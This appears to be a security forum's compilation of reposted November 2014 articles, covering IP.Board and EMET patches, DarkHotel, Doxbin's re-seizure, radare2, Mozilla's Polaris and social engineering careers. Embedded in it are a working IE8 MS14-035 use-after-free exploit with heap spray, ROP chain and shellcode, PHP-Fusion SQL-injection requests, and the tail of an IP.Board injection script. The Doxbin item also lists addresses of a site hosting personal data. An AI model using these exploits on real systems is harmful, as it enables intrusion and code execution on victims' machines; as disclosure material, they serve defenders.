0x3a, members_pass_salt)', 'members', j) print '----------------' Sursa: Full Disclosure: IP.Board <= 3.4.7 SQL Injection

SQL Injection Vulnerability Patched in IP.Board Forum Software By Eduard Kovacs on November 10, 2014 Invision Power Services (IPS) has released patches to address an SQL injection vulnerability affecting versions 3.3.x and 3.4.x of the popular online forum software IP.Board. IPS learned of the existence of an exploit for the vulnerability on Sunday when it published a post advising users to disable the IPS Connect service, which allows multiple sites to share one login, by deleting the "interface/ipsconnect/ipsconnect.php" file from their installations. "Most clients will not need this service but if you do use it then we still suggest you temporarily disable until a fix is released tomorrow," IPS said. Patches and additional details on the SQL injection vulnerability were released a few hours later. According to developers, SQL injection attacks are possible on certain PHP configurations. "Although this exploit requires some knowledge of your configuration and for certain files to be web-readable, we felt it important to release an update," IPS explained. An exploit written in Python was published on several websites on Sunday. According to the author of the exploit, the error-based blind SQL injection flaw affects IP.Board version 3.4.7 and earlier. One of the administrators of the vpsBoard forum claims IPS only learned of the existence of the exploit after he notified them. A vpsBoard member said he successfully tested the exploit on his own website by knowing only the URL. "I ran the exploit against my IPB and it injected SQL just fine - no 'knowledge' was needed other than the URL," the user with the online moniker raindog308 said. IP.Board developers have also learned "that it may be possible to send attachments via the email classes which would ordinarily be removed." A fix for this issue, reported privately to IPS by Andrew Erb, is also included in the patches. The patches are automatically applied for IPS Community in the Cloud customers running IP.Board 3.3 or above. Users who have installed or upgraded their installations to version 3.4.7 after the patches were released don't need to take any action since the main download files have been updated. This year, IPS released a total of four security updates to address cross-site scripting (XSS), file inclusion and other vulnerabilities found in IP.Board. Sursa: SQL Injection Vulnerability Patched in IP.Board Forum Software | SecurityWeek.Com

[h=3]EMET 5.1 is available[/h] swiat 10 Nov 2014 8:45 AM Today, we’re releasing the Enhanced Mitigation Experience Toolkit (EMET) 5.1 which will continue to improve your security posture by providing increased application compatibility and hardened mitigations. You can download EMET 5.1 from microsoft.com/emet or directly from here. Following is the list of the main changes and improvements: Several application compatibility issues with Internet Explorer, Adobe Reader, Adobe Flash, and Mozilla Firefox and some of the EMET mitigations have been solved. Certain mitigations have been improved and hardened to make them more resilient to attacks and bypasses. Added “Local Telemetry” feature that allows to locally save memory dumps when a mitigation is triggered. All the changes in this release are listed in Microsoft KB Article 3015976. If you are using Internet Explorer 11, either on Windows 7 or Windows 8.1, and have deployed EMET 5.0, it is particularly important to install EMET 5.1 as compatibility issues were discovered with the November Internet Explorer security update and the EAF+ mitigation. Alternatively, you can temporarily disable EAF+ on EMET 5.0. Details on how to disable the EAF+ mitigation are available in the User Guide. In general we recommend upgrading to the latest version of EMET to benefit from all the enhancements. We want to particularly thank Luca Davi, Daniel Lehmann, and Ahmad-Reza Sadeghi from System Security Lab at Technical University Darmstadt/CASED, and René Freingruber form SEC Consult for partnering with us. Your feedback is always welcome as it helps us improve EMET with each new release, so we encourage you to reach out using the Connect Portal or by sending an email to emet_feedback@microsoft.com. - The EMET Team Sursa: EMET 5.1 is available - Security Research & Defense - Site Home - TechNet Blogs

Becoming a Hacker – Intangible Skills By Ethical Hacking Posted in: EH Tips, Hacking How to become a hacker has created a buzz among IT security students and professionals, people have selected ehacking.net (via email, comment, Tweets etc.) as their mentor and we will surely help you out till time. In the previous episode of this series, we have discussed the objective of this guide, education and skills that required and the method to become the master; and in this episode we will take a look into philosophical & Psychological side of a Penetration tester. You might be thinking that hacking process has nothing to do with philosophy & psychology but believe me it has; apart from the technical skills,the success of any hacking attack is also depends on the psyche of the attacker. Intangible Skills “Focus” is the key to get success in every aspect of life, be focused on what you want to achieve. Let's consider an example, you want to find a vulnerability in Facebook; you tried your level best, you were trying to achieve the objective but you failed. The word failure shows your weakness, so please hide it or destroy it; you can't fail until you keep trying. “You only fail when you accept your defeat” The foremost skill to become a penetration tester is never ever give-up and be focused in achieving your objective. If you will be able to develop this skill then take my word, “nobody can stop you to become a hacker/IT security expert”. Let's get back to the example; finding a vulnerability in Facebook takes time, patience, persistence, attention and believe me it is possible. Keep try until and unless you will get success, the same suggestion for this guide too; don't show impatience, read and implement. Are you developing the skills discussed in the first episode ? Have the mentor been selected yet ? Are you trying to become (focus) a hacker ? We have discussed many important points so far that could lead you to get the success, if you can understand these points. Attitude, Values, Culture Winning, success and achieving the objective are all the attitude of a hacker mindset; the value is to care and learn. Learning is very essential, you need to learn new skills, latest technology and everything, make reading your habit. Limited resources and unlimited wants; in hacking culture you have to believe that everything is possible, you yes you, the master of your own. Increase your capacity of learning, develop problem solving skills; start with basic mathematics, move to algorithm, functions and so on. Remember resources are limited but your wants are unlimited you need to fulfill your wants either by limiting your needs (not recommending) or increasing your capacity (highly recommended). Don't ever indulge yourself in the repetitive tasks which you will soon find boring, your attitude should show that you are creative; because you have the creativity to understand the working and process of everything and yes you can make amendment to enhance or destruct the system (this is your attitude). Freedom & Competency You need freedom, you want freedom and you love freedom; act this and demonstrate this. You are competent and you need to prove it; select your benchmark, work and achieve higher than this, judge and rate yourself. Make yourself prepared for the real competition, you should not afraid of competition; you are creative, you are competent (this is your value, and you have to prove). Develop and sharpen your core competency, your core competency is the one you do best and nobody can beat you. Make this world to believe in you by showing your competency, and you will become the mentor of many. Conclusion Lets close another chapter, I need your feedback; also I need to know how are you performing, are you getting the right direction ? Share your words. Incorporate the aforementioned skills in your daily life, if you just read and forget then you will achieve nothing; as discussed be focused, learn and implement. In the next article we will discuss the technical skills that required to become a hacker/information security professional. Image Credit Related post Hacking Hack an Isolated Computer - No Internet Connection Required Required Technical Skills to be a Hacker White House computer network 'hacked' Russia involved Hacking WPS - SILICA Wireless Assessments EH Tips Required Technical Skills to be a Hacker Bluetooth is Watching: Detect the Surveillance Systems Becoming a Hacker - What, How and Why Sursa: Becoming a Hacker – Intangible Skills | Ethical Hacking-Your Way To The World Of IT Security

[h=1]A Full Stack WYSIWYG Editor[/h] [h=1]for Network Packets[/h] [h=3]Edit L1 - L7 with just a few clicks[/h] [h=2]Features[/h] [h=3]Simple Interface[/h] Edit any packet at any layer from L1 to L7 with just a few mouse clicks. No hacking required. No need to look at Hex dumps. [h=3]Deep Understanding[/h] WireEdit knows all mandatory/optional elements of a packet, their data types, encoding, inter-dependency, position offsets, value constraints, checksums, etc. [h=3]Just works[/h] As you're editing WireEdit takes care of all the behind-the-scene details on the fly. No need to think about any of it. Sursa: https://wireedit.com/

Dark Net hackers steal seized site back from the FBI By Patrick Howell O'Neill Twitter on November 10, 2014 There's a tug of war at play on the Dark Net. Last week, American and European law enforcement triumphantly took control of 27 Dark Net websites last week in the highly publicized Operation Onymous, a campaign against a wide variety of Tor hidden services and their operators, including so-called Silk Road 2.0 and its alleged boss, 26-year-old Blake Benthall. Now, the new owners of one seized hidden website have taken their website back from police. The re-seized hidden service, Doxbin, is fully operational as of 1pm ET. Doxbin is a website dedicated to hosting tens of thousands of records containing sensitive information about private individuals, such as addresses, phone numbers, and Social Security Numbers. It’s made headlines numerous times, most notably recently when the judge in the trial of the original Silk Road, which was shuttered by the FBI last year, was threatened on the site, and her address, phone number, and personal details made public. The loss of Doxbin last week was mourned by the site’s fans. RIP doxbin pic.twitter.com/nFbrHoyVil — Anonymous (@blackplans) November 8, 2014 RIP Silk Road 2.0, doxbin, along with many other sites. Your legacy remains. pic.twitter.com/joT8aYyDad — john (@Anxieties) November 7, 2014 While police took control of the sites, the actual owners remain free and are speaking out in public. Earlier this weekend, they released aggregate log reports to the public in hopes that observers could identify the weakness that police used to seize the hidden service. Now, Doxbin's previous owners have handed off control of their website to an "interested party" who has re-seized the wesbite and at least three .onion addresses that direct to it, according to records at the hidden service search engine ahmia.fi. Moreover, the new owners have created a brand new.onion address in order to prevent police from re-seizing Doxbin. Anyone can currently access Doxbin at http://npieqpvpjhrmdchg.onion/ and http://doxbinumfxfyytnh.onion/, two previously seized addresses. Another .onion has been added at http://doxbinrqbk7lcslw.onion/. While the backbone required to take a website back from the police has been applauded by some observers, re-seizing the website isn’t necessarily challenging from a technical perspective. An .onion address is simply a hash of a private key used to control the domain. The previous owners handed the private key off and so now both police and the new owners of Doxbin possess the private key. That means that each can seize the domain at will, hence the game of tug of war. .@chobopeon The private_keys were handed to an interested party, who is playing tug of war with ICE/Eurolol. We're not involved — nachash (@loldoxbin) November 10, 2014 While the re-seizure is likely temporary, the website is now able to advertise a new and not-yet seized address to its old users. Last week, the website looked like this after police action: RIP DOXBIN pic.twitter.com/DW43ex4CCn — Jeb Boone (@JebBoone) November 7, 2014 Now, a mirror of the site called “THE INDESTRUCTIBLE SKY CASTLE,” revives the old Doxbin: Clarification: This article has been updated with new language to clarify ownership of the new Doxbin sites. Photo by David Goehring (CC BY 2.0) Sursa: Dark Net hackers steal seized site back from the FBI

Radare – The Reverse Engineering Framework Radare started out as a simple command line interface for a hexadecimal editor supporting 64 bit offsets to make searches and recovering data from hard-disks. It has evolved into a project that is composed of a hexadecimal editor as the central point of the project with assembler/disassembler, code analysis, scripting features, analysis and graphs of code and data and easy unix integration. Essentially, it has become a reverse engineering framework, with plugins and much more. radare2 itself is the core of the hexadecimal editor and debugger. Allows to open any kind of file from different IO access like disk, network, kernel plugins, remote devices, debugged processes and handle any of them as if they were a simple plain file. It implements an advanced command line interface for moving around the file, analyzing data, disassembling, binary patching, data comparision, searching, replacing, scripting with Ruby, Python, Lua and Perl. Features CLI and visual modes Yank and paste Perl/Python scripting support Virtual base address for on-disk patching vi-like environment and command repetition (3x) Debugger for x86-linux/bsd and arm-linux Data bookmarking (flags) Scripting (no branches or conditionals yet) Own magic database (rfile) Little/big endian conversions Data search Show xrefs on arm, x86 and ppc binaries Data type views Data block views Visual mode commands You can download radare here: radare2-0.9.7.tar.xz Or read more here – the author can be found on Twitter here @trufae. Sursa: Radare - The Reverse Engineering Framework - Darknet - The Darkside

“DarkHotel” uses bogus crypto certificates to snare Wi-Fi-connected execs Malware operators know in advance when targeted fat cats will check in and out. by Dan Goodin - Nov 10 2014, 11:20pm GTBST DeviantArt user: Tincho555 Researchers have uncovered a seven-year-old malware operation that combines advanced cryptographic attacks, zero-day exploits, and well-developed keyloggers to target elite executives staying in luxury hotels during business trips. The attackers behind "DarkHotel," as the advanced persistent threat has been dubbed, appear to know in advance when a targeted exec will check in and check out of a hotel. Victims are infected through a variety of methods, including bogus software updates for Adobe Flash, Google Toolbar, or other trusted software that are presented when the exec uses the hotel's Wi-Fi or wired Internet access. In many cases, the attack code is signed with a trusted digital certificate that the attackers were able to clone by factoring the underlying 512-bit private key. While factoring weak 512-bit keys has been practical for several years, the crypto attack nonetheless is an "advanced" capability, particularly a few years ago. Taken together, the characteristics are an indication the operators have some sophistication, said researchers from Kaspersky Lab, the Russia-based security firm that disclosed the campaign. "The fact that most of the time the victims are top executives indicates the attackers have knowledge of their victims whereabouts, including name and place of stay," the researchers wrote in a report published Monday. "This paints a dark, dangerous web in which unsuspecting travelers can easily fall. While the exact reason why some hotels function as an attacker vector are unknown, certain suspicions exist, indicating possibly a much larger compromise. We are still investigating this aspect of the operation and will publish more information in the future." Kaspersky researchers observed DarkHotel malware spreading in several undisclosed hotel networks when people connected to Wi-Fi were prompted to install counterfeit software updates. In other cases, targets are infected through spearphishing messages, some of which include attack code exploiting previously unknown vulnerabilities in Flash, Internet Explorer, or other types of software. Once infected by DarkHotel, computers will install various keyloggers or other forms of malware that are tailored to specific victims. The malware monitors passwords, communications, and system information on infected machines and periodically sends the data in encrypted form to servers controlled by the attackers. One of the things that makes the campaign unusual is its use of luxury hotel networks as a watering hole of sorts to target and infect high-value executives. The report stated: In this case, the Darkhotel attackers wait for their victim to connect to the Internet over the hotel Wi-Fi or the cable in their room. There is a very strong likelihood the targets will connect over these resources, and the attackers rely on that likelihood, much like at a watering hole. But the attackers also maintain truly precise targeting information over the victim’s visit, much like they would know a victim’s e-mail address and content interests in a spearphishing attack. While setting up the attack, the Darkhotel attackers knew the target’s expected arrival and departure times, room number, and full name, among other data. This data enables the attackers to present the malicious iframe precisely to that individual target. So, here we have yet another unique characteristic of this attacker—they employ a loosely certain but highly precise offensive approach. DarkHotel malware was also seeded to bittorrent feeds, where it was downloaded more than 30,000 times in less than six months. Kaspersky-owned network sensors have detected "thousands" of DarkHotel infections, mostly from the bittorrent feeds. Japan, Taiwan, China, Russia, and Korea were the five countries most affected by the malware. Enlarge Kaspersky Lab Much of the malware is or was cryptographically signed with digital certificates belonging to a trusted third party. All of the underlying private keys of the cloned certificates were generated using 512-bit md5 keys. The ability of attackers to factor the weak keys for use in such malware attacks has long been known, as advisories issued from Fox-IT, Microsoft, Mozilla, and Entrust warned in 2011. All the cloned keys have expired or been revoked. Signing code with trusted certificates helps eliminate warning messages that may be presented during installation. "All related cases of signed Darkhotel malware share the same Root Certificate Authority and Intermediate Certificate Authority that issued certificates with weak md5 keys (RSA 512 bits)," Monday's Kaspersky report stated. "We are confident that our Darkhotel threat actor fraudulently duplicated these certificates to sign its malware. These keys were not stolen." More recently, DarkHotel operators have stolen third-party certificates to sign their malware. Some of the DarkHotel malware samples date back to 2007. One file includes a keylogger designed to resemble a legitimate low-level Microsoft system device. Other components include a small downloader, an information stealer, a dropper and selfinjector, and a "selective infector" that infects executable files with an old-fashioned virus. Sursa: “DarkHotel” uses bogus crypto certificates to snare Wi-Fi-connected execs | Ars Technica

[h=1]Internet Explorer 8 MS14-035 Use-After-Free Exploit[/h] <!-- Exploit Title: MS14-035 Use-after-free Exploit for IE8 Date: 10 Nov 2014 Exploit Author: Ayman Sagy <aymansagy@gmail.com> https://www.linkedin.com/in/aymansagy Tested on: IE8 with Java6 on Windows7 --> <html> <head><title>MS14-035 IE8 Use-after-free Exploit</title></head> <body> <!-- <APPLET id="dummy" code="dummy.class" width=100 height=100> You need to install Java to view this page. </APPLET> --> <div id="mydiv">x</div> <form id="frm"></form> <div id="sprayfrm"></div> <script type="text/javascript"> spraysize = 5000; sprayelement = document.getElementById("sprayfrm"); sprayelement.style.cssText = "display:none"; var data; offset = 0x506; buffer = unescape("%u2020%u2020"); pivot = unescape("%u8b05%u7c34"); // stack pivot // MSVCR71 rop = unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret; rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2} rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect rop += unescape("%u5645%u7c36"); // pop esi;ret; rop += unescape("%u5243%u7c34"); // ret; rop += unescape("%u8f46%u7c34"); // pop ebp;ret; rop += unescape("%u87ec%u7c34"); // call eax; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ufdff%uffff"); // {size} rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size} rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx} rop += unescape("%u39fa%u7c34"); // pop edx;ret; rop += unescape("%uffc0%uffff"); // {flag} rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag} rop += unescape("%u4648%u7c35"); // pop edi;ret; rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment} rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret; rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret; rop += unescape("%u683f%u7c36"); // push esp;ret; rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010 // calc shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163"); /* _______0x1cc_____ | | \|/ | Junk ROP Shellcode Pivot Junk 2 3 1 */ while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34"); buffer += rop; buffer += shellcode; while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34"); while (buffer.length < 0x1000) buffer += buffer; data = buffer.substring(0,offset) + pivot + rop + shellcode data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS { var obj = document.createElement("button"); obj.title = data.substring(0,0x40000-0x58); //obj.style.fontFamily = data.substring(0,0x40000-0x58); sprayelement.appendChild(obj); } block = unescape( // Literal string to avoid heap allocation "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+ "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"); blocks = new Array(); for (i = 0; i < spraysize; i++) { // spray 1 blocks.push(document.createElement("button")); blocks[i].setAttribute("title",block.substring(0, block.length)); sprayelement.appendChild(blocks[i]); } for (i = spraysize/2; i < spraysize; i++) { // free some blocks blocks[i].setAttribute("title",""); } var newdiv = document.createElement('div'); newdiv.innerHTML = "<textarea id='CTextArea'></textarea>"; document.getElementById("frm").appendChild(newdiv); var newdiv2 = document.createElement('div'); newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>"; document.getElementById("frm").appendChild(newdiv2); document.getElementById("CInput").checked = true; trigger = true; document.getElementById("frm").reset(); function crash() { if (trigger) { document.getElementById("frm").innerHTML = ""; // Free object, trigger bug CollectGarbage(); for (i = spraysize/2; i < spraysize; i++) { // spray 2 blocks[i].setAttribute("title",block.substring(0, block.length)); } } } </script> </body> </html> Sursa: http://www.exploit-db.com/exploits/35213/

[h=1]PHP-Fusion 7.02.07 - SQL Injection[/h] # Exploit Title: PHP-Fusion 7.02.07 SQL Injection # Date: 06/11/2014 # Exploit Author: Mauricio Correa # Vendor Homepage: www.php-fusion.co.uk # Software Link: http://ufpr.dl.sourceforge.net/project/php-fusion/PHP-Fusion%20Archives/7.x/ PHP-Fusion-7.02.07.zip # Version: 7.02.07 # Tested on: Linux OS (Debian) # CVE : CVE-2014-8596 GET /PHP-Fusion/files/administration/submissions.php?action=2&aid=9b23a9871adc75 cd&submit_id=1[SQL Injection]&t=n HTTP/1.1 Host: 192.168.0.105 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620 b17122152bf157283f; fusion68fF5_lastvisit=1414550801; session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9; fusion68fF5_visited=yes; has_js=1; Connection: keep-alive and GET /PHP-Fusion/files/administration/members.php?aid=9b23a9871adc75cd&status=4[S QL Injection] HTTP/1.1 Host: 192.168.0.105 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620 b17122152bf157283f; fusion68fF5_lastvisit=1414550801; session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9;; fusion68fF5_visited=yes; has_js=1; Connection: keep-alive More informations (in Portuguese Br): https://www.xlabs.com.br/blog/?p=282 Sursa: http://www.exploit-db.com/exploits/35206/

[h=1]Introducing Polaris Privacy Initiative to Accelerate User-focused Privacy Online[/h]Denelle Dixon-Thayer At Mozilla, we believe that an individuals’ privacy on the Internet cannot be treated as optional. Our Privacy Principles guide us with the design of each of our products and services. We’ve introduced features to support our privacy focus across desktop and mobile, including: an add-on platform with Firefox Add-ons like LightBeam, Ghostery and Privacy Badger; the Do Not Track preference; Private and Guest Browsing; high levels of encryption with Firefox Sync; an individual approach to apps permissions; and even a new Forget button. But we recognize we need to do better and do more. We want to give our users the Web experience they want through features that create transparency and control. We want our users to trust us and the Web. In October 2014, Harris Poll conducted a global online survey* on behalf of Mozilla of more than 7,000 online adults ages 18-64. Three quarters (74%) of people feel their personal information on the Web is less private today than it was one year ago. That same figure of adults agree that Internet companies know too much about them. We think we can help with this concern. Today, we are excited to announce a new strategic initiative at Mozilla called Polaris. Polaris is a privacy initiative built to pull together our own privacy efforts along with other privacy leaders in the industry. Polaris is designed to allow us to collaborate more effectively, more explicitly and more directly to bring more privacy features into our products. We want to accelerate pragmatic and user-focused advances in privacy technology for the Web, giving users more control, awareness and protection in their Web experiences. We want to advance the state of the art in privacy features, with a specific focus on bringing them to more mainstream audiences. We’re joined at launch by the Center for Democracy & Technology (CDT), and the Tor Project both non-profits, who will support and advise Polaris projects and help us align them with policy goals. We believe that the support and assistance from each of these groups is crucial. “CDT looks forward to working with Mozilla on the Polaris program and advising on issues like combating Internet censorship and protecting online anonymity, which are vital to promoting free expression online.” said Justin Brookman of CDT. Not only will these collaborations hold us accountable to staying true to our goal of getting new and innovative privacy features into our general release products, the diversity of understanding, focus and opinion will improve what we bring to the mainstream. Today we’re announcing two experiments under the Polaris banner, focused on anti-censorship technology, anonymity, and cross-site tracking protection. First, Mozilla engineers are evaluating the Tor Project’s changes to Firefox, to determine if changes to our own platform codebase can enable Tor to work more quickly and easily. Mozilla will also soon begin hosting our own high-capacity Tor middle relays to make Tor’s network more responsive and allow Tor to serve more users. “The Tor Project is excited to join Mozilla as a launch partner in the Polaris program. We look forward to working together on privacy technology, open standards, and future product collaborations,” said Andrew Lewman of the Tor Project. The second experiment (which is our first in-product Polaris experiment) seeks to understand how we can offer a feature that protects those users that want to be free from invasive tracking without penalizing advertisers and content sites that respect a user’s preferences. We’re currently testing this privacy tool in our “Nightly” channel. The experiment is promising, but it’s not a full-fledged feature yet. We’ll test and refine the user experience and platform behavior over the coming months and collect feedback from all sides before this is added to our general release versions. We recognize that privacy is not just a functionality on your computer or a setting you can turn on or off, and we’re excited to see what we can do to advance privacy online with Polaris. To learn more or to join us, visit the wiki. *Survey Methodology This survey was conducted online within Great Britain, France, Spain, German, Brazil, and India between October 22nd and 29th, 2014 among 7,077 adults (aged 18-64) by Harris Poll on behalf of Mozilla via its Global Omnibus product. Figures for age, sex, race/ethnicity, education, region and household income were weighted where necessary to bring them into line with their actual proportions in the population. Where appropriate, this data were also weighted to reflect the composition of the adult online population. For complete survey methodology, including weighting variables, please contact press@mozilla.com Sursa: https://blog.mozilla.org/privacy/2014/11/10/introducing-polaris-privacy-initiative-to-accelerate-user-focused-privacy-online/

How To Become a Social Engineer November 10, 2014 I really must admit that one of the most asked questions we get through the website is something like, “I really want to get into social engineering as a career, what should I read/take in college to give me the best chance?” then followed up by “How do I get into this as a job/career?” It is a serious question that we have spent considerable time trying to come with an appropriate answer for. This month I will answer the education piece, by telling you my own thoughts, what I look for when I hire and also what some of my most trusted friends from large companies look for when hiring. Then next month, I will go into how to make this your career. So you wanna be a social engineer? I understand why the question comes in so often. This job is pretty cool sounding. We get paid to phish, vish and break into companies every day. That certainly sounds like the dream job – well at least for a lot of us. Like most careers, it is logical to think that there may be a clear path to education to help you with a leg up in this field. Some people ask me, if they should study psychology, if they should get sales experience, others wonder if they should skip school all together. What’s the answer? Let’s first ask my good friend Jim. He manages a large team of pentesters that includes red teams, social engineers and some excellent hackers at one of the world’s largest financial institutions. I asked him this question, “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester what do you look for? Education, experience or a combination?” Jim says, “First of all I look for experience. But there are certifications that mean something to me like Offensive Security’s certifications (OSCP / OSCE) and the CISSP. In addition, my mantra is generally: Jack-of-all-trades, master of a couple. I look for folks who have a fairly broad generalist experience, but have taken an interest in deeply diving into one or two. I also look for mentality; can the candidate think like a bad guy? Is security your job, or a passion? What does your home network look like? And very importantly, does the candidate have the ability to communicate clearly, concisely, and professionally. Finally, personal references are good, especially when it comes to character, since if you join my team you’re going to have to be a highly trusted individual.” Thanks Jim, that was very helpful. I went another very close friend who has been in the industry for a very long time helping run Black Hat and now running the Global Education and Training practice at Accuvant, Ping Look. Jim, “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester what do you look for? Education, experience or a combination?” Ping said, “Accuvant does not look for degrees – experience and ability to pass the practical exams that we administer and references, especially industry ones, are more important. I know that most hacker’s goals aren’t to be promoted to management but the reality is that everyone has to make a living and having more responsibility within a company usually means a promotion whether it be to management or not. I do know from anecdotal experience of others that at a lot of larger firms, not having a college degree will make it more difficult to be promoted (initially) to management positions. HOWEVER in a technical field, smart companies know that InfoSec is still an emerging marketplace and that finding a candidate with a college degree, especially in computer science who is also a good infosec practitioner with the necessary experience will be very difficult. Over time, those who prove themselves technically adept and have good management chops end up having the same chance in getting promotions or running teams or being lead technologist or chief research scientist as the guy with a degree.” Another excellent answer, that really helps us to get a clear picture. Finally, I went to my good friend, Dave Kennedy. Dave started his own company just a few years ago, Trusted Sec, and went from just a couple people to over 20 people. He obviously knows a thing or two about hiring pentesters. So I presented him with the same question, “If you wanted to hire a young man or woman to be part of your team as a social engineer or pentester what do you look for? Education, experience or a combination?” Dave said, “I favor experience over education any day. Although a college degree is important, I am looking for someone who has the experience to handle the type of work that we get. References are important, but I tend to hire people I’ve known and trust in the industry so I always get individuals I know and trust to do the work.” All three answers really paint a great picture for anyone thinking and asking. What about Social-Engineer, Inc? My company has personally grown over the last couple years so I have had to spend considerable time thinking about what it is that I need in employees. Unlike some of the great minds I asked above, my needs are a tad bit different. But let me pick out the similarities from what we saw above: Experience always wins. Many of my team have degrees, and some, like Michele are not only highly educated but trained educators. Even with that, experience is king. Now with that said there aren’t just slews of people that have tons of experience in phishing, vishing and breaking into buildings without having a criminal record. I will discuss later how we get around this particular hurdle in a bit. Mentality: This is a big one because there are many components to this particular topic. Can the person think like a bad guy? We have a motto in my company, “Always leave them feeling better for having met you.” We apply that to how we want our customers to feel about our services. So although I need my people to be able to THINK like a bad guy, I need them to care enough about the customer that they don’t revel in the bad side too long. Desire to learn. We are in a constant state of growth, and part of that is learning how to adapt when the times, attack vectors and methods of the bad guys change. My team has to be willing to do that. Learn from failure. I have failed so many times I can’t count them, but the important part is learning from each failure. My team has to be willing to have the same attitude. Is this a hobby or a passion? It is important to me to find people who enjoy the work and don’t just look at it as a “job”. [*]Performance based education. Right now from what I found, Social-Engineer has the only performance based SE Certification around. I also favor the Offensive Security Certifications as they prove fortitude, persistence and critical thinking skills. [*]Critical thinkers. Probably one of the most important aspects of being a social engineer is being able to critically think. To adapt, flex and change your methods on the fly. To be able to think outside the box, as if there is no box. [*]Willingness to try new things. Many times my team will be required to try completely new things, new pretexts, new methodologies and new processes. Does this mean that education is completely useless? No, not at all. Depending on the role we are looking for a degree can definitely add to usefulness and the position we use the person for. If you are going to college already and you are thinking of a career in pentesting and maybe even social engineering, then there are some areas of study that can help. Things like computer sciences, psychology and social psychology can all help. Of course, we think everyone who wants to be a social engineer should take our 5-day “Advanced Practical Social Engineering” course too. In the end, the fortitude to stick through college, study hard and graduate with good grades can tell a potential employer that you have some great qualities to make a good employee. In the end of the day, social engineering is an exciting and very rewarding career path. Study hard, stay out of trouble and get practical experience where you can and it may just be your career someday too. Next month we will discuss the HOW… till then, stay safe. - See more at: http://www.social-engineer.org/newsletter/social-engineer-newsletter-vol-05-issue-61 Sursa: How To Become a Social Engineer | Christopher Hadnagy | LinkedIn